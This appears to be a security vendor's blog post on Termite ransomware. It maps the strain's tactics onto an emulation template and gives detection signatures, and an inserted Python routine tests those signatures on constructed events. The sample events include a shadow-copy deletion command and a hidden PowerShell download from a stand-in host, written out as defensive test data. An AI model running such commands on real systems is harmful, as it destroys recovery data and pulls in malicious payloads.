Termite is a ransomware strain that emerged in November 2024 and quickly established itself as a significant threat following its attribution to multiple high-profile cyberattacks that disrupted operations across several industries.

Its operators conduct highly targeted activities, typically initiated through phishing attacks, compromised websites, or the exploitation of software vulnerabilities to acquire initial access to victim environments. Once a foothold is established, Termite employs double extortion tactics by combining data exfiltration with file encryption to maximize pressure on victims by threatening both operational downtime and data exposure.

Termite is widely believed to be based on Babuk Ransomware, a defunct strain whose source code was leaked in 2021. While Babuk’s influence remains evident, particularly in encryption routines and general behavior, Termite distinguishes itself by aggressively targeting environment-specific vulnerabilities.

The group rose to prominence following its November 2024 attack on Blue Yonder, a major provider of supply chain management solutions. The incident disrupted operations across multiple regions for multiple global corporations, illustrating the ransomware’s potential for widespread impact through the compromise of third-party service providers.

Notably, CL0P ransomware operators also claimed Blue Yonder as a victim, leading to speculation regarding potential connections, shared tactics, or overlapping exploitation paths. While no direct affiliation has been established between the two groups, their convergence on the same high-profile target highlights the interconnected nature and growing complexity of the ransomware ecosystem.

AttackIQ has released a new attack graph composed of the several Tactics, Techniques and Procedures (TTPs) exhibited by Termite ransomware during its most recent activities, with the aim of helping customers validate their security controls and their ability to defend against this sophisticated and recent threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against baseline behaviors associated with the Termite ransomware.
  • Assess their security posture against an opportunistic adversary that does not discriminate when selecting its targets.
  • Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups currently focused on ransomware activities.

[Malware Emulation] Termite Ransomware – 2024-12 – Associated Tactics, Techniques and Procedures (TTPs)

This emulation replicates the sequence of behaviors associated with the deployment of Termite ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.

The assessment template is based on behaviors reported by Cyble on December 6, 2024, and Joe Sandbox on December 13, 2024.

Initial Access, Discovery & Impact – Local System Reconnaissance

This stage begins with the deployment of Termite ransomware which, once operational, retrieves the system’s Globally Unique Identifier (GUID) and proceeds to enumerate running services and processes via Windows API calls. Finally, it will execute vssadmin.exe to delete available Volume Shadow Copies.

Ingress Tool Transfer (T1105): This scenario downloads the sample to memory and saves it to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Query Registry (T1012): This scenario queries the MachineGUID value located within the HKLM\SOFTWARE\Microsoft\Cryptography registry key which contains the unique identifier of the system.

System Service Discovery (T1007): This scenario executes the QueryServiceStatusEx and EnumDependentServices Windows API calls to retrieve information pertaining to a given service.

Process Discovery (T1057): This scenario uses the Windows API to obtain a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process entry with Process32FirstW and Process32NextW.

Inhibit System Recovery (T1490): This scenario executes the vssadmin.exe Windows utility to delete a Volume Shadow Copy created by the emulation.

Discovery & Impact – Termite Ransomware File Encryption

This stage begins by gathering information regarding the underlying hardware, followed by the discovery of accessible network shares, volumes and logical disks. The file system is then systematically traversed to identify files of interest, which are subsequently encrypted using a combination of ChaCha20 and Elliptic-curve Diffie–Hellman (ECDH) over Curve25519.

System Information Discovery (T1082): This scenario executes the GetSystemInfo Native API call to retrieve information associated with the system.

Network Share Discovery (T1135): This scenario executes the NetShareEnum Windows native API call to enumerate network shares from the local computer.

System Information Discovery (T1082): This scenario executes the FindFirstVolumeW and FindNextVolumeW Windows API calls to iterate through the available volumes of the system.

System Information Discovery (T1082): This scenario executes the GetLogicalDrives Windows API call to retrieve the currently available disk drives.

System Information Discovery (T1082): This scenario executes the GetDriveTypeW Windows API call to retrieve information regarding the system’s physical drives.

File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows API calls to perform the enumeration of the file system.

Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using encryption algorithms similar to those used by Babuk ransomware.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

2. Inhibit System Recovery (T1490):

Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.

2a. Detection

Deletion of Volume Shadow Copies is usually the first step that occurs and can be detected by looking at command-line activity:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ("vssadmin" AND "Delete Shadows")
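The two signatures above (1a and 2a) expressed as a small detection routine run over constructed process-creation events. This is an added example, not AttackIQ's or the platform's detection content; the event field names (image, command_line), the Sysmon-style shape of the telemetry and the case-insensitive matching are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List, Tuple

# One process-creation event as a telemetry pipeline would present it
# (e.g. Sysmon Event ID 1 or an EDR equivalent). Field names are assumed.
@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the started executable
    command_line: str   # full command line of the new process

SHELLS = {"cmd.exe", "powershell.exe"}

def _image_name(image: str) -> str:
    """Basename of a Windows image path, lower-cased for comparison."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def t1105_powershell_download(ev: ProcessEvent) -> bool:
    """Rule 1a: shell process whose command line has (IWR | Invoke-WebRequest)
    AND DownloadData AND Hidden. IWR is matched as a whole word to avoid
    substring false positives; everything is compared case-insensitively."""
    if _image_name(ev.image) not in SHELLS:
        return False
    cl = ev.command_line.lower()
    downloader = re.search(r"\biwr\b", cl) or "invoke-webrequest" in cl
    return bool(downloader) and "downloaddata" in cl and "hidden" in cl

def t1490_shadow_copy_deletion(ev: ProcessEvent) -> bool:
    """Rule 2a: shell process whose command line has vssadmin AND 'Delete Shadows'."""
    if _image_name(ev.image) not in SHELLS:
        return False
    cl = ev.command_line.lower()
    return "vssadmin" in cl and "delete shadows" in cl

RULES: Dict[str, Callable[[ProcessEvent], bool]] = {
    "T1105 Ingress Tool Transfer": t1105_powershell_download,
    "T1490 Inhibit System Recovery": t1490_shadow_copy_deletion,
}

def evaluate(events: Iterable[ProcessEvent]) -> List[Tuple[str, ProcessEvent]]:
    """Apply every rule to every event; return (rule name, event) hits in order."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]

# Constructed sample telemetry (not real Termite logs): two events that should
# fire, one 'vssadmin list shadows' that must not, and a benign service host.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://example.invalid/stage2.bin ; DownloadData"'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "cmd.exe /c vssadmin list shadows"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

def sample_hits() -> List[str]:
    """Rule names that fire on SAMPLE_EVENTS, in event order."""
    return [name for name, _ in evaluate(SAMPLE_EVENTS)]
```

Running `evaluate` over real process-creation telemetry is the point; the `list shadows` event shows that the 2a rule stays silent on the read-only form of the same utility.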

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery.

Wrap-up

In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by Termite ransomware operators. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.